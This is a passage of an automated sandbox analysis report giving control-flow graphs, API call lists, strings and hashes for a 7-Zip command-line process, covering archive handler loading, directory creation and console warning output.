                                                                                                                                                                                                                                                  control_flow_graph 2649 99a180-99a1e9 GetProcAddress * 2 2650 99a1eb-99a1fe GetProcAddress 2649->2650 2651 99a214-99a22a GetProcAddress 2649->2651 2653 99a233-99a23e 2650->2653 2654 99a200-99a20d 2650->2654 2652 99a22c-99a22e 2651->2652 2651->2653 2655 99a72b-99a73e 2652->2655 2656 99a729 2653->2656 2657 99a244-99a2f0 call 973208 call 998928 2653->2657 2654->2653 2661 99a20f 2654->2661 2656->2655 2664 99a648 2657->2664 2665 99a2f6-99a30a 2657->2665 2661->2655 2666 99a718-99a727 call 9994a8 2664->2666 2667 99a31c-99a321 2665->2667 2668 99a30c-99a31a 2665->2668 2666->2655 2672 99a328-99a32b 2667->2672 2668->2672 2673 99a34a-99a350 2672->2673 2674 99a32d-99a345 call 97ae2c call 9994a8 2672->2674 2676 99a36f-99a37d SysStringByteLen 2673->2676 2677 99a352-99a36a call 97ae2c call 9994a8 2673->2677 2690 99a634-99a63d 2674->2690 2680 99a64d-99a65d call 97ae2c 2676->2680 2681 99a383-99a3e3 call 97ae2c * 2 call 973208 * 2 call 998928 2676->2681 2677->2690 2680->2666 2701 99a3e9-99a40c call 998928 2681->2701 2702 99a662-99a678 free * 2 2681->2702 2690->2657 2693 99a643 2690->2693 2693->2656 2705 99a67d-99a693 free * 2 2701->2705 2706 99a412-99a424 call 999d98 2701->2706 2702->2666 2705->2666 2708 99a429-99a485 call 9987a8 call 998860 2706->2708 2713 99a698-99a6ae free * 2 2708->2713 2714 99a48b-99a49c 2708->2714 2713->2666 2715 99a4ee-99a51b call 999380 2714->2715 2716 99a49e-99a4a5 2714->2716 2722 99a521-99a526 2715->2722 2723 99a6b0-99a6d1 free * 3 2715->2723 2717 99a4ab-99a4d9 call 9987a8 2716->2717 2724 99a4db-99a4de 2717->2724 2725 99a4e5-99a4ec 2717->2725 2726 99a528-99a53f call 9998d4 2722->2726 2727 99a541-99a564 call 999380 2722->2727 2723->2666 2724->2725 2725->2715 2725->2717 2734 99a583-99a5b7 call 998860 2726->2734 2732 99a56a-99a57e call 99a034 2727->2732 2733 99a6d3-99a6f4 free * 3 2727->2733 2732->2734 2733->2666 2738 99a5bd-99a5c0 2734->2738 2739 99a6f6-99a715 free * 3 2734->2739 2740 99a5cf-99a5e4 call 972130 2738->2740 2741 99a5c2-99a5ca 2738->2741 2739->2666 2744 99a5f8 2740->2744 2745 99a5e6-99a5f6 call 999af0 2740->2745 2741->2740 2746 99a5fb-99a62f call 97b8f0 free * 3 call 9994a8 2744->2746 2745->2746 2746->2690
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                  • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                                                                                                                                                                                                                                                  • API String ID: 190572456-3984264347
                                                                                                                                                                                                                                                  • Opcode ID: cb2dc4ab122eac0aefa29758d493a890b66f0c095af12c08d7e82ec3a4e8295b
                                                                                                                                                                                                                                                  • Instruction ID: dcc82fc22b8d41e5bd57b66f6f32ff08a6775d133811372280baa78a998a3d65
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb2dc4ab122eac0aefa29758d493a890b66f0c095af12c08d7e82ec3a4e8295b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3D17532319AC096CE20EB26F85179EB3A4F7C5B80F805515EA8E47B69DF7CC545CB41

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2752 9770c8-9770e4 call 977d4c 2754 9770e9-9770ec 2752->2754 2755 9770ee-9770f0 2754->2755 2756 9770f9-977103 call 979d84 2754->2756 2755->2756 2757 9770f2-9770f4 2755->2757 2761 977105-977107 2756->2761 2762 97710c-977136 call 979ed8 call 973274 call 97376c 2756->2762 2759 977449-977458 2757->2759 2761->2759 2769 97715b-977175 call 973314 2762->2769 2770 977138-977141 2762->2770 2777 97717a-977186 call 97a170 2769->2777 2770->2769 2771 977143-977145 2770->2771 2773 977147 2771->2773 2774 97714c-977155 2771->2774 2776 9773f1-9773fe free 2773->2776 2774->2769 2776->2759 2780 9771aa-9771ac 2777->2780 2781 977188-977195 CreateDirectoryW 2777->2781 2782 9771b2-9771d2 call 973208 call 97a7ec 2780->2782 2783 97727d-977286 GetLastError 2780->2783 2784 977360-977364 2781->2784 2785 97719b-9771a4 GetLastError 2781->2785 2807 977273-977278 free 2782->2807 2808 9771d8-9771e7 CreateDirectoryW 2782->2808 2787 9772e4-9772ed GetLastError 2783->2787 2788 977288-9772b5 call 977d28 call 973208 call 977ebc 2783->2788 2789 977366-977379 call 979ab0 2784->2789 2790 9773c9-9773e1 free * 2 2784->2790 2785->2780 2785->2783 2794 9773e3-9773ee free 2787->2794 2795 9772f3-977301 call 97376c 2787->2795 2828 9772b7-9772c4 free 2788->2828 2829 9772c6-9772db free 2788->2829 2803 977381 2789->2803 2804 97737b-97737f 2789->2804 2790->2759 2794->2776 2805 977307-977309 2795->2805 2806 977432-977447 free * 2 2795->2806 2810 977385-9773a3 call 973460 call 976c84 2803->2810 2804->2810 2805->2806 2812 97730f-977316 2805->2812 2806->2759 2807->2783 2813 977356-97735b free 2808->2813 2814 9771ed-9771f6 GetLastError 2808->2814 2834 9773a5-9773a9 2810->2834 2835 9773ad-9773c4 free * 2 2810->2835 2817 97732c-977332 2812->2817 2818 977318-97731c 2812->2818 2813->2784 2819 977207-977230 call 977d28 call 973208 call 977ebc 2814->2819 2820 9771f8-977202 free 2814->2820 2825 977419-977430 free * 2 2817->2825 2826 977338-97733c 2817->2826 2823 977322-977326 2818->2823 2824 977400-977417 free * 2 2818->2824 2841 977232-97724a free * 2 2819->2841 2842 97724f-977271 free * 2 2819->2842 2820->2787 2823->2817 2823->2824 2824->2759 2825->2759 2826->2777 2831 977342-977351 2826->2831 2828->2787 2833 9772e0-9772e2 2829->2833 2831->2777 2833->2784 2833->2787 2834->2789 2837 9773ab 2834->2837 2835->2759 2837->2790 2841->2787 2842->2833
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00977D4C: GetFileAttributesW.KERNELBASE ref: 00977D6E
                                                                                                                                                                                                                                                    • Part of subcall function 00977D4C: GetFileAttributesW.KERNEL32 ref: 00977DA5
                                                                                                                                                                                                                                                    • Part of subcall function 00977D4C: free.MSVCRT ref: 00977DB2
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009773F6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AttributesFilefree
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1936811914-0
                                                                                                                                                                                                                                                  • Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                                                                                                  • Instruction ID: 97fb9fd6ddb76368789ba247edb9e0ce6da216f619b93e7d6b6776f263a6bd07
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C481972322C541D2CA20EF62E85176EE321FBC5B84F44D522FB9E8766ADF2CC945D750

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2843 977ebc-977ee3 call 979b68 2846 977fca-977fd6 call 979ddc 2843->2846 2847 977ee9-977f26 call 97339c call 979ce4 2843->2847 2853 978253-97828a call 979d0c call 979b30 2846->2853 2854 977fdc-977fe4 2846->2854 2859 977f8c-977fa4 call 9791dc 2847->2859 2860 977f28-977f2c 2847->2860 2872 978306-97830b 2853->2872 2873 97828c-978294 2853->2873 2854->2853 2857 977fea-97800c call 973274 * 2 2854->2857 2876 97800e-978017 2857->2876 2877 97801b-978020 2857->2877 2870 977fa6 2859->2870 2871 977fa8-977fac 2859->2871 2860->2859 2863 977f2e-977f77 call 97abb0 2860->2863 2863->2859 2884 977f79-977f87 2863->2884 2878 977fb9-977fc5 call 9789d8 2870->2878 2879 977fb6 2871->2879 2880 977fae-977fb3 2871->2880 2881 97830d-978312 2872->2881 2882 978318-97831c 2872->2882 2873->2872 2883 978296-9782a5 call 977d4c 2873->2883 2876->2877 2885 978022-97803e call 972880 2877->2885 2886 978040-97804c call 973670 2877->2886 2892 978519-978524 2878->2892 2879->2878 2880->2879 2881->2882 2888 9784f2-978500 call 977978 2881->2888 2889 978377-978381 call 979c80 2882->2889 2890 97831e-978330 call 977d4c 2882->2890 2883->2888 2904 9782ab-9782b2 2883->2904 2884->2892 2885->2886 2901 978051-978062 call 979ce4 2885->2901 2886->2901 2905 978505-978506 2888->2905 2889->2888 2909 978387-978396 2889->2909 2890->2888 2908 978336-97833d 2890->2908 2919 978064-978067 2901->2919 2920 9780b1-9780bb call 977ebc 2901->2920 2904->2888 2910 9782b8-9782eb call 97339c 2904->2910 2906 978509-978511 call 97794c 2905->2906 2918 978516 2906->2918 2908->2888 2913 978343-978372 2908->2913 2909->2888 2914 97839c-9783a6 call 979ab0 2909->2914 2922 9782ed-9782f8 2910->2922 2923 9782fc-978301 2910->2923 2913->2906 2914->2888 2927 9783ac-9783c2 call 973274 2914->2927 2918->2892 2925 978075-9780a3 2919->2925 2926 978069-97806c 2919->2926 2931 9780c1-978108 call 973314 call 973208 call 977ce0 2920->2931 2933 97823e-97824e free * 2 2920->2933 2922->2923 2923->2906 2930 9780a5-9780af call 973404 2925->2930 2925->2931 2926->2920 2929 97806e-978073 2926->2929 2939 9783c4-9783ce call 972fec 2927->2939 2940 9783d2-9783f2 2927->2940 2929->2920 2929->2925 2930->2931 2953 97815a-978185 free * 2 call 97794c free 2931->2953 2954 97810a-978111 2931->2954 2933->2853 2939->2940 2944 9783f4-9783fe call 972fec 2940->2944 2945 978402-978437 call 977978 2940->2945 2944->2945 2955 978484-97849d call 977d4c 2945->2955 2956 978439-978457 wcscmp 2945->2956 2969 97822d-978239 free 2953->2969 2961 978113-978124 call 972748 2954->2961 2962 97818a-9781c1 SetLastError free * 2 call 97794c free 2954->2962 2970 9784b3-9784f0 call 97339c free 2955->2970 2971 97849f-9784a1 2955->2971 2957 97847c 2956->2957 2958 978459-978477 call 97339c free 2956->2958 2957->2955 2958->2906 2977 9781c3-9781ca 2961->2977 2978 97812a-978158 free call 973208 call 977ce0 2961->2978 2962->2969 2969->2892 2970->2906 2974 9784a7-9784b1 free 2971->2974 2975 9784a3-9784a5 2971->2975 2974->2888 2975->2970 2975->2974 2980 9781e0-97822a call 97362c free * 2 call 97794c free 2977->2980 2981 9781cc-9781d1 2977->2981 2978->2953 2978->2954 2980->2969 2981->2980 2984 9781d3-9781dc 2981->2984 2984->2980
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0097812F
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0097816A
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0097817F
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00978232
                                                                                                                                                                                                                                                    • Part of subcall function 0097ABB0: GetModuleHandleW.KERNEL32 ref: 0097ABD1
                                                                                                                                                                                                                                                    • Part of subcall function 0097ABB0: GetProcAddress.KERNEL32 ref: 0097ABE1
                                                                                                                                                                                                                                                    • Part of subcall function 0097ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0097AC32
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32 ref: 0097818F
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0097819B
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009781A6
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009781BB
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00978243
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0097824E
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0097815F
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$AddressDiskErrorFreeHandleLastModuleProcSpacememmove
                                                                                                                                                                                                                                                  • String ID: :$:$DATA$\
                                                                                                                                                                                                                                                  • API String ID: 4130059181-1004618218
                                                                                                                                                                                                                                                  • Opcode ID: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                                                                  • Instruction ID: f72f49d30429393df68d42267812d8d9b012bd61bc4b63dbe1727285c790bc35
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A302A03354968096CB20DF2AD5902AEB770F7D5790F80C226E79E87B69DF38C5A5CB04

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2991 9b3e84-9b3eb5 2992 9b3ebb 2991->2992 2993 9b41e8 2991->2993 2994 9b3ebe-9b3efa fputs call 9b2e24 2992->2994 2995 9b41ea-9b41fd 2993->2995 2998 9b3efc-9b3f03 2994->2998 2999 9b3f51-9b3f59 2994->2999 3002 9b3f1f-9b3f4c call 973274 call 9b30cc free 2998->3002 3003 9b3f05-9b3f1d fputs call 972300 2998->3003 3000 9b3f5b-9b3f62 2999->3000 3001 9b3f64-9b3f6f 2999->3001 3004 9b3f73-9b3f9e call 9b2e24 call 9b3148 3000->3004 3001->3004 3002->2999 3003->2999 3015 9b3fd3-9b3fe3 call 9b3034 3004->3015 3016 9b3fa0-9b3fce fputs * 2 call 972640 call 972300 3004->3016 3020 9b3fe8-9b3fea 3015->3020 3016->3015 3020->2995 3022 9b3ff0-9b3ff7 3020->3022 3023 9b3ff9-9b4027 fputs * 2 call 9726a0 call 972300 3022->3023 3024 9b402c-9b403c 3022->3024 3023->3024 3024->2995 3029 9b4042-9b4048 3024->3029 3030 9b404a-9b4079 3029->3030 3031 9b40af-9b40b9 3029->3031 3037 9b41b9 3030->3037 3038 9b407f-9b4096 call 9b3034 3030->3038 3032 9b40bf-9b40e0 fputs 3031->3032 3033 9b419d-9b41b1 3031->3033 3032->3033 3040 9b40e6-9b40fc 3032->3040 3033->2994 3034 9b41b7 3033->3034 3034->2993 3039 9b41bd-9b41ca SysFreeString 3037->3039 3044 9b41bb 3038->3044 3045 9b409c-9b40ad SysFreeString 3038->3045 3039->2995 3040->3033 3042 9b4102-9b4133 3040->3042 3047 9b4139-9b4162 3042->3047 3048 9b41cc 3042->3048 3044->3039 3045->3030 3045->3031 3051 9b41ce-9b41d8 call 97ae2c 3047->3051 3052 9b4164-9b4197 call 9b2ecc call 97ae2c SysFreeString 3047->3052 3049 9b41d9-9b41e6 SysFreeString 3048->3049 3049->2995 3051->3049 3052->3033 3052->3042
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$FreeString$fputcfree
                                                                                                                                                                                                                                                  • String ID: = $--$----$Path$Type$Warning: The archive is open with offset
                                                                                                                                                                                                                                                  • API String ID: 2701146716-1919703766
                                                                                                                                                                                                                                                  • Opcode ID: 98949995720aafeada5ab4e649821211fbe2246f847a42084f07584e6b56428e
                                                                                                                                                                                                                                                  • Instruction ID: f9468ae22aa5f56d0399a8780475384b822fa71343fce87e9e47f7f202e58266
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98949995720aafeada5ab4e649821211fbe2246f847a42084f07584e6b56428e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA917936618A8582DB10EF2AEA547AE7370F7D4BE4F419122EE5E47B29DF38C945C700

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 3059 97f71c-97f74e call 971610 3062 97f774-97f7c2 _isatty * 3 3059->3062 3063 97f750-97f773 call 9902a0 _CxxThrowException 3059->3063 3065 97f7d4 3062->3065 3066 97f7c4-97f7c8 3062->3066 3063->3062 3069 97f7d9-97f81c 3065->3069 3066->3065 3068 97f7ca-97f7ce 3066->3068 3068->3065 3070 97f7d0-97f7d2 3068->3070 3071 97f81e-97f822 3069->3071 3072 97f82a 3069->3072 3070->3069 3071->3072 3073 97f824-97f828 3071->3073 3074 97f830-97f834 3072->3074 3073->3072 3073->3074 3075 97f836 3074->3075 3076 97f83c-97f846 3074->3076 3075->3076 3077 97f854-97f85e 3076->3077 3078 97f848-97f84e 3076->3078 3079 97f860-97f866 3077->3079 3080 97f86c-97f876 3077->3080 3078->3077 3079->3080 3081 97f884-97f88e 3080->3081 3082 97f878-97f87e 3080->3082 3083 97f8f3-97f8fd 3081->3083 3084 97f890-97f89d 3081->3084 3082->3081 3085 97f8ff-97f917 3083->3085 3086 97f91a-97f931 call 97ac74 * 2 3083->3086 3087 97f89f-97f8a9 3084->3087 3088 97f8ab-97f8be call 97ed34 3084->3088 3085->3086 3096 97f936-97f940 3086->3096 3087->3083 3094 97f8e6-97f8ed 3088->3094 3095 97f8c0-97f8e5 call 9902a0 _CxxThrowException 3088->3095 3094->3083 3095->3094 3098 97f946-97f95c 3096->3098 3099 97f9dd-97f9e7 3096->3099 3101 97f965-97f977 wcscmp 3098->3101 3102 97f95e-97f963 3098->3102 3103 97fa94-97fa9c 3099->3103 3104 97f9ed-97f9fa 3099->3104 3105 97f9bb-97f9c2 call 97ad0c 3101->3105 3106 97f979-97f98c call 97ed34 3101->3106 3102->3105 3104->3103 3107 97fa00-97fa1c call 972bc8 call 972d34 3104->3107 3105->3099 3114 97f9c4-97f9d7 call 9bd4c0 call 97ac74 3105->3114 3115 97f9b4 3106->3115 3116 97f98e-97f9b3 call 9902a0 _CxxThrowException 3106->3116 3122 97fa4f-97fa74 call 9902a0 _CxxThrowException 3107->3122 3123 97fa1e-97fa3b call 973f78 3107->3123 3114->3099 3115->3105 3116->3115 3133 97fa75-97fa8f GetCurrentProcess SetProcessAffinityMask free 3122->3133 3131 97fa3d-97fa46 3123->3131 3132 97fa49-97fa4d 3123->3132 3131->3132 3132->3122 3132->3133 3133->3103
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • Unsupported switch postfix -stm, xrefs: 0097FA52
                                                                                                                                                                                                                                                  • Unsupported switch postfix for -slp, xrefs: 0097F991
                                                                                                                                                                                                                                                  • SeRestorePrivilege, xrefs: 0097F91C
                                                                                                                                                                                                                                                  • SeCreateSymbolicLinkPrivilege, xrefs: 0097F92A
                                                                                                                                                                                                                                                  • Unsupported switch postfix -bb, xrefs: 0097F8C3
                                                                                                                                                                                                                                                  • SeLockMemoryPrivilege, xrefs: 0097F9CB
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
                                                                                                                                                                                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                                                                                                                                                                                                                                                  • API String ID: 1961088698-2328792591
                                                                                                                                                                                                                                                  • Opcode ID: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                                                                                                  • Instruction ID: e35030dbe384dcc2080ed6d5f496a89ef515b9361bcf0a5be3dd1951315d4895
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37A19E73608AC5DAEB21DF29E4A03AC3B60E395B94F98C176DB8D47766DF24C985C700

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 3134 9ba448-9ba455 3135 9ba49c-9ba4a4 3134->3135 3136 9ba457-9ba45f 3134->3136 3137 9ba4a6-9ba4a9 3135->3137 3138 9ba4f4 3135->3138 3136->3135 3139 9ba461-9ba495 call 972300 fputs call 9726a0 call 972300 3136->3139 3140 9ba4ab-9ba4da call 972300 fputs call 9726a0 call 972300 3137->3140 3141 9ba4df-9ba4e5 3137->3141 3142 9ba4fc-9ba50a 3138->3142 3139->3135 3140->3141 3141->3142 3145 9ba53d-9ba559 free 3142->3145 3146 9ba50c 3142->3146 3150 9ba55b 3145->3150 3151 9ba58c-9ba5b5 free 3145->3151 3148 9ba510-9ba526 3146->3148 3153 9ba538-9ba53b 3148->3153 3154 9ba528-9ba533 free * 2 3148->3154 3156 9ba55f-9ba575 3150->3156 3159 9ba5b7-9ba5be 3151->3159 3160 9ba5c5-9ba5c8 3151->3160 3153->3145 3153->3148 3154->3153 3162 9ba587-9ba58a 3156->3162 3163 9ba577-9ba582 free * 2 3156->3163 3159->3160 3165 9ba5c0 3159->3165 3167 9ba5ca-9ba5e6 _CxxThrowException 3160->3167 3168 9ba5e7-9ba603 free 3160->3168 3162->3151 3162->3156 3163->3162 3170 9ba5c0 call 9b66a8 3165->3170 3167->3168 3171 9ba626-9ba637 free call 99a13c 3168->3171 3172 9ba605 3168->3172 3170->3160 3175 9ba63c-9ba675 call 9b7080 call 97182c call 9b7f50 3171->3175 3173 9ba609-9ba624 free 3172->3173 3173->3171 3173->3173 3182 9ba6a8-9ba6c9 free 3175->3182 3183 9ba677 3175->3183 3184 9ba67b-9ba691 3183->3184 3186 9ba6a3-9ba6a6 3184->3186 3187 9ba693-9ba69e free * 2 3184->3187 3186->3182 3186->3184 3187->3186
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$fputs$ExceptionThrowfputc
                                                                                                                                                                                                                                                  • String ID: Errors: $Warnings:
                                                                                                                                                                                                                                                  • API String ID: 437615013-2345102087
                                                                                                                                                                                                                                                  • Opcode ID: b879da1ccfc066a1247b5c29666ac93705d06d21a2897076d20723f3459c7b25
                                                                                                                                                                                                                                                  • Instruction ID: 68dc0a1a73b1467cea205d1875ab295ad3543e519646d1c4d3eaa2bc29e373d4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b879da1ccfc066a1247b5c29666ac93705d06d21a2897076d20723f3459c7b25
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 935195633695C181CA30EB26FA913EDA362F7C1BA0F448512DA9E17769CF78C886C711

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
